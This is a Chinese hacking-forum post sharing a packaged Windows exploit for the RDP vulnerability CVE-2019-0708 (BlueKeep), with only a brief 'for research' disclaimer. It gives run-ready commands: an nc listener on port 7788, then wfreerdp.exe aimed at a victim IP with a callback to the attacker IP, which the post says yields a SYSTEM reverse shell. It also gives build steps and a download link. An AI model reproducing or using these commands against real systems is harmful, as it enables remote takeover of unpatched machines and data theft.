查看: 17942|回复: 0

[工具专区] CVE-2019-0708-EXP-Windows-Version

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2019-9-26 17:08:09 | 显示全部楼层 |阅读模式
    作者poc仅供研究目的,如果读者利用本poc从事其他行为,与本人无关

    CVE-2019-0708-EXP-WIndows版独立exe运行,无需linux,python,ruby等,运行后直接反弹System权限Shell

    复现环境
    被攻击者操作系统Victim:Windows 7 sp1 x64位操作系统
    攻击者操作系统Attacker:Windows 10 x64位操作系统
    编译环境Visual Studio 2013
    使用说明
    进入CVE-2019-0708-EXP-Release目录
    运行nc.exe -lvp 7788
    运行wfreerdp.exe /v:Victim_IP /l:Attacker_IP,如wfreerdp.exe /v:10.120.1.160 /l:10.120.1.17
    安装教程
    复制FreeRDP-master项目至E:\git\KernelResearch\FreeRDP-master\
    解压openssl.7z至C:\openssl\
    以管理员身份安装nasm-2.14.02-installer-x64.exe
    添加C:\Program Files\NASM至path环境变量
    以管理员身份安装cmake-3.15.3-win64-x64.msi
    添加C:\Program Files\CMake\bin至path环境变量
    重启计算机
    解压nasmBuildCustomizations.rar其中3个文件至C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\BuildCustomizations\
    client->common->freerdp-client工程目录右击->"工程依赖项"->"生成自定义",然后勾选nasm这一项
    运行"C:\Program Files\CMake\bin\cmake.exe" E:\git\KernelResearch\FreeRDP-master\CMakeCache.txt
    编译项目,如果发现仍然缺少文件,可以从FreeRDP-master-restore.7z还原

    运行效果:

    uiXN6S.png

    下载地址:https://gitee.com/cbwang505/CVE-2019-0708-EXP-WIndows
    回复

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-24 04:28 , Processed in 0.024519 second(s), 16 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部